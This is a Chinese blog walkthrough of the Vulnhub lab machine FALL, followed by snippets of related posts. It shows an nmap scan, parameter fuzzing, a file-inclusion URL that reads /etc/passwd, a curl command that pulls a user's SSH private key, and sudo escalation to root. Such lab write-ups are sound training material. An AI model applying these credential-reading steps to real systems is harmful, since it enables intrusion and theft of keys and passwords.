Vulnhub-DIGITALWORLD.LOCAL: FALL渗透

已于 2024-01-10 22:56:17 修改
阅读量487 收藏 8
点赞数 9
分类专栏: Vulnhub靶机渗透 文章标签: 网络安全 网络 安全 安全威胁分析
于 2023-11-29 09:52:25 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/laoyanCZ/article/details/134674559
版权

Vulnhub靶机下载链接:

点我直接下载靶机icon-default.png?t=N7T8https://download.vulnhub.com/digitalworld/FALL.7z

如果不会导入Vulnhub上的靶机,请点击我直达发车文章

在下面的操作中如果有不懂的可以直接私信博主

虚拟机的IP配置

通过arp-scanl -l来获取当前网段的存活ip。

再根据创建虚拟机的时候的MAC地址就可以拿到靶机的IP

  • Kali IP:192.168.2.103
  • 靶机IP:192.168.2.128

渗透目标: 

  • 获取靶机/root/目录下的flag文件

渗透概括:

  1. web目录扫描
  2. wfuzz GET参数爆破
  3. 通过文件包含获取私钥
  4. 私钥登录
  5. 历史记录审计
  6. sudo su提权

第一步:信息收集

我们这里用nmap -sS -sV -A -T4 -p- IP对靶机进行全端口综合扫描

扫描结果如下

┌──(root㉿kali)-[~]
└─# nmap -sS -sV -A -T4 -p- 192.168.2.128 
Starting Nmap 7.94 ( https://nmap.org ) at 2023-11-28 02:15 EST
mass_dns: warning: Unable to determine any DNS servers. Reverse DNS is disabled. Try using --system-dns or specify valid servers with --dns-servers
Nmap scan report for 192.168.2.128
Host is up (0.00076s latency).
Not shown: 65387 filtered tcp ports (no-response), 135 filtered tcp ports (host-prohibited)
PORT      STATE  SERVICE     VERSION
22/tcp    open   ssh         OpenSSH 7.8 (protocol 2.0)
| ssh-hostkey: 
|   2048 c5:86:f9:64:27:a4:38:5b:8a:11:f9:44:4b:2a:ff:65 (RSA)
|   256 e1:00:0b:cc:59:21:69:6c:1a:c1:77:22:39:5a:35:4f (ECDSA)
|_  256 1d:4e:14:6d:20:f4:56:da:65:83:6f:7d:33:9d:f0:ed (ED25519)
80/tcp    open   http        Apache httpd 2.4.39 ((Fedora) OpenSSL/1.1.0i-fips mod_perl/2.0.10 Perl/v5.26.3)
|_http-server-header: Apache/2.4.39 (Fedora) OpenSSL/1.1.0i-fips mod_perl/2.0.10 Perl/v5.26.3
| http-robots.txt: 1 disallowed entry 
|_/
|_http-title: Good Tech Inc's Fall Sales - Home
|_http-generator: CMS Made Simple - Copyright (C) 2004-2021. All rights reserved.
111/tcp   closed rpcbind
139/tcp   open   netbios-ssn Samba smbd 3.X - 4.X (workgroup: SAMBA)
443/tcp   open   ssl/http    Apache httpd 2.4.39 ((Fedora) OpenSSL/1.1.0i-fips mod_perl/2.0.10 Perl/v5.26.3)
|_http-generator: CMS Made Simple - Copyright (C) 2004-2021. All rights reserved.
| tls-alpn: 
|_  http/1.1
| http-robots.txt: 1 disallowed entry 
|_/
|_http-title: Good Tech Inc's Fall Sales - Home
|_ssl-date: TLS randomness does not represent time
|_http-server-header: Apache/2.4.39 (Fedora) OpenSSL/1.1.0i-fips mod_perl/2.0.10 Perl/v5.26.3
| ssl-cert: Subject: commonName=localhost.localdomain/organizationName=Unspecified/countryName=US
| Subject Alternative Name: DNS:localhost.localdomain
| Not valid before: 2019-08-15T03:51:33
|_Not valid after:  2020-08-19T05:31:33
445/tcp   open               Samba smbd 4.8.10 (workgroup: SAMBA)
3306/tcp  open   mysql       MySQL (unauthorized)
8000/tcp  closed http-alt
8080/tcp  closed http-proxy
8443/tcp  closed https-alt
9090/tcp  open   http        Cockpit web service 162 - 188
|_http-title: Did not follow redirect to https://192.168.2.128:9090/
10080/tcp closed amanda
10443/tcp closed cirrossp
MAC Address: 08:00:27:DB:E0:43 (Oracle VirtualBox virtual NIC)
Aggressive OS guesses: Linux 5.0 - 5.4 (98%), Linux 4.15 - 5.8 (94%), Linux 5.1 (93%), Linux 2.6.32 - 3.13 (93%), Linux 2.6.39 (93%), Linux 5.0 - 5.5 (92%), Linux 2.6.22 - 2.6.36 (91%), Linux 3.10 - 4.11 (91%), Linux 3.10 (91%), Linux 2.6.32 (90%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 1 hop
Service Info: Host: FALL; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2023-11-28T15:17:32
|_  start_date: N/A
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb-os-discovery: 
|   OS: Windows 6.1 (Samba 4.8.10)
|   Computer name: fall
|   NetBIOS computer name: FALL\x00
|   Domain name: \x00
|   FQDN: fall
|_  System time: 2023-11-28T07:17:32-08:00
|_clock-skew: mean: 10h39m59s, deviation: 4h37m09s, median: 7h59m58s

TRACEROUTE
HOP RTT     ADDRESS
1   0.76 ms 192.168.2.128

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 178.51 seconds

发现开放的端口还是比较多的,80的http服务还有CMS,那么就首先从80端口下手

直接先目录扫一波,如下

发现了一个可疑的php文件,果断查看

第二步:模糊测试

这里报了一个缺少GET请求参数的问题

那么我们用WFUZZ爆破一下这个参数,如下

这里扫出来了一个file参数

给file参数传一个"/etc/passwd",发现正常回显了,是一个文件包含的洞.

并且在这个passwd文件里还发现了一个qiu用户

http://192.168.2.128/test.php?file=/etc/passwd

第三步:私钥获取

我们在这里尝试利用文件包含来把qiu的ssh私钥显示出来

使用"curl http://192.168.2.128/test.php?file=/home/qiu/.ssh/id_rsa > id_rsa"命令来导出这个私钥文件,并且用cat查看一下这个文件,防止出现错误

 第四步:提权

出于openssh的安全性,密钥文件权限需要给600才能够正常使用

chmod 600 id_rsa

我们跟着使用这个私钥登录qiu用户

我们进来之后,用查看一下.bash_history历史记录文件

发现了一个密码"remarkablyawesomE"

我们用"sudo -l"看一下权限

发现密码正确,并且拥有全部的sudo权限

那么我们就可以用"sudo su"命令提权了如下图。

我们再查看flag文件即可,该靶机就已经完成了。

疯狂搞网安的19岁老登
关注
专栏目录
OSCP-Vulnhub靶机记录-digitalworldlocal-fall
深入交流学习:webMsec
09-30 287
-hh 隐藏char值为80的结果(错误的参数都这里报80,第一次wfuzz没有加此参数)尝试用读取/home/qiu目录下默认存ssh密钥文件,通过前面扫描端口知道他是开了ssh的。vulnhub和htb有很多为OSCP准备的靶机,都可以打一打。再回leafpad,搜索一下“enum”,看看枚举出什么目录。复制保存到攻击机,key文件最后要有一个回车,否则登录不上去。这里的GET参数是 file,可以尝试文件包含。那么,我们可以试一下,用哪个参数可以拼接进去。ls 一下,提示我们是低权限用户。
Vulnhub:Digitalworld.local (Development)靶机
qq_43884092的博客
04-09 578
访问development目录,提示存在一个流量包,查看流量包发现另一个网站路径:/developmentsecretpage/directortestpagev1.php,访问该路径后退出登录,再重新登录,用户名和密码随便填写,之后页面提示报错,根据报错搜索关键字
Vulnhub:Digitalword.local (FALL)靶机
qq_43884092的博客
04-15 158
wfuzz爆破test.php的参数,文件包含qiu用户私钥文件,查看.bash_history得到用户qiu的密码
vulnhubFALL
qq_54030686的博客
10-28 337
这里采用fuzz探测所需参数,这里介绍两种方法,第一种是burpsuite设置参数进行暴力破解,第二种是采用wfuzz或者ffuf等工具进行实现,这里提供下简单的命令,详细使用方法会在下一篇进行描述。ssh登录的话可以采取两种方式,第一种为账号密码,第二种为id_rsa即公钥私钥文件进行登录,这里获取qiu用户的id_rsa文件进行登录,使用文件包含获取文件,保存为文件,这里命名为sskey,值得注意的是,需要全部复制,从——开始到——结束,然后使用命令。vulnhubfall。难度:so easy。
红队打靶练习:DIGITALWORLD.LOCAL: FALL
最新发布
分享
12-25 729
红队打靶练习:DIGITALWORLD.LOCAL: FALL。文件上传的巧妙利用!!!犹如食鹫盘旋般的绝望感......
靶机渗透练习60-digitalworld.localFALL
hirak0的博客
04-20 2124
靶机描述 靶机地址:https://www.vulnhub.com/entry/digitalworldlocal-fall,726/ Description To celebrate the fifth year that the author has survived his infosec career, a new box has been born! This machine resembles a few different machines in the PEN-200 environm
Vulnhub Fall靶场 Walkthrough
RichardLuo
04-16 194
Vulnhub Fall靶场 Walkthrough
bash: start-dfs.sh: command not found
zl305866424的博客
12-21 7183
bash: start-dfs.sh: command not found
/usr/local/hadoop/libexec/hadoop-functions.sh: 行 2360: HADOOP_ORG.APACHE.HADOOP.HBASE.UTIL.GETJAVAPR
weixin_42534009的博客
05-04 8833
启动hive之前,请先启动hadoop集群。 hadoop集群可以启动,但是启动hive时出现以下内容,不知怎么解: hadoop@dblab-VirtualBox:/usr/local$ cd hive hadoop@dblab-VirtualBox:/usr/local/hive$ ./bin/hive /usr/local/hadoop/libexec/hadoop-functions....
cvc-complex-type.3.2.2: 元素 'ref' 中不允许出现属性 'local'
游海东的技术专栏
09-20 1万+
1、错误描述2015-09-20 22:16:46 [main] ERROR org.springframework.test.context.TestContextManager - Caught exception while allowing TestExecutionListener [org.springframework.test.context.support.DependencyI
Failure to transfer org.springframework.boot:spring-boot-starter-parent:pom:2.4.3错误详解
热门推荐
qq_41486775的博客
03-03 2万+
今天在构建springcloud微服务的时候,导入相关依赖,发现pom.xml报错了,报错信息如下: Failure to transfer org.springframework.boot:spring-boot-starter-parent:pom:2.4.3 from https://repo.maven.apache.org/maven2 was cached in the local repository, resolution will not be reattempted until th.
Vulnhub靶场篇:Vulnix
夜车星繁的博客
05-14 2406
VMWARE虚拟机下搭建环境: 攻击机kali IP:192.168.223.136 靶机IP:192.168.223.133 首先进行信息收集: nmap -sS -sV -T4 -A -p- 192.168.223.133 可以看到此靶机开放了众多端口服务;SSH、FTP、Finger、POP3、NFS等 另外在端口25SMTP栏下我们看到VRFY(用于验证指定的用户/邮箱是否存在;由于安全原因,服务器常禁止此命令)没有被禁用 从SMTP入手;使用工具smtp-user...
digitalworld.local:FALL 打靶记录
hackzkaq的博客
11-15 87
mysql的空密码登录一定要尝试。一些明显是开发遗存的文件记得要尝试FuZZ,说不定就是意想不到的结果。私钥登录时,注意私钥的权限。提权遍历时,要尽量仔细,不要遗漏。
vulnhub-symfonos-4(文件包含 & ssh投毒& 命令执行 & linux提权)
Ma79328的博客
04-30 712
vulnhub -symfonos4 靶场环境 靶机:172.168.20.133 kali:172.168.20.110 1、打开靶场浏览器访问靶场IP地址 2、扫描目录 使用kali自带目录扫描工具进行目录扫描 dirb http://172.168.20.133/ /usr/share/dirb/wordlists/big.txt -X .php 发现一个php的登陆页面 3、访问atlantis.php页面 使用万能密码绕过登录界面 5.发现文件包含,尝试包含ssh日志文件 #Linux
VULNHUB靶机渗透——hackable2
aarong的博客
12-20 2110
前言 可能很多人在进行靶机渗透的时候会出现扫描不出靶机IP的情况,这里是靶机的网络配置没有设置好,设定跟你的虚拟网卡一致就可以了,具体参考这篇文章和这篇文章。 渗透过程 网络拓扑:攻击机和靶机同是NAT模式 (1)arp-scan -l扫描本地主机IP 这里根据MAC地址的不同判断出192.168.65.133为靶机IP地址 (2)Nmap扫描 nmap -A -T4 -p 1-65535 192.168.65.133 这里发现靶机开放了21 22 80三个端口,而且21端口是允许匿名登录的,等会直接
记一次vulnhub|渗透测试 DC-3
crispr的博客
01-17 1648
vulnhub DC-3 0X01 Main Point 1.searchsploit的使用 2.网站指纹识别(Wappalyzer插件) 3.Netcat(反弹shell)初步和下载脚本提权 4.探测Linux内核版本进行攻击得到root权限 0X02 前期嗅探和端口探测 kali下使用arp-scan获取靶机IP,使用nmap探测端口开放,只有80端口开放。 先从网站入手看看有...
vulnhub靶场,DC-2
kukudeshuo的博客
07-10 318
vulnhub靶场,DC-2 环境准备 靶机下载地址:https://www.vulnhub.com/entry/dc-2,311/ 攻击机:kali(192.168.58.130) 靶机:DC-2(192.168.58.145) 下载好靶机之后直接使用VMware Workstation Pro虚拟机导入环境,启动即可,将网段设置为NAT模式 信息收集 使用arp-scan确定目标靶机 确定目标靶机IP为192.168.58.145 使用nmap扫描目标靶机端口开放情况 目标靶机开放端口:80、77
Vulnhub靶机 Digitalworld.local (JOY)
菜浪马废的博客
05-03 848
ftp可以任何人登录 查看一下 查看version_control文件 看见:proftpd 1.3.5
Digitalworld.local (Development)--VulnHub靶机学习记录
weixin_45509443的博客
07-24 708
1.端口扫描 2.登录8080看下,根据说明有隐藏页面,然而nikto dirb等都无法目录扫描,应该也是像页面提示说的一样被入侵检测系统拦截了,那怎么找目录呢,这就有点脑洞了,原来隐藏目录就是html_pages 进入隐藏目录,接下来就是一顿翻目录了 最后在/development.html目录,查看源码发现提示,进入秘密页面 /developmentsecretpage 发现登录页面 ,无论输入什么都是报错,爆破注入什么的别想了,都是连接超时,smb服务爆破同样结局,看来..
rc-local.service: failed to execute
05-12
`rc-local.service: failed to execute` 表示 `rc-local.service` 无法执行。这可能是由于 `rc-local` 文件中的语法错误或命令错误导致的。您可以尝试使用以下步骤来解决此问题: 1. 检查 `rc-local` 文件中的语法...
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

疯狂搞网安的19岁老登

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值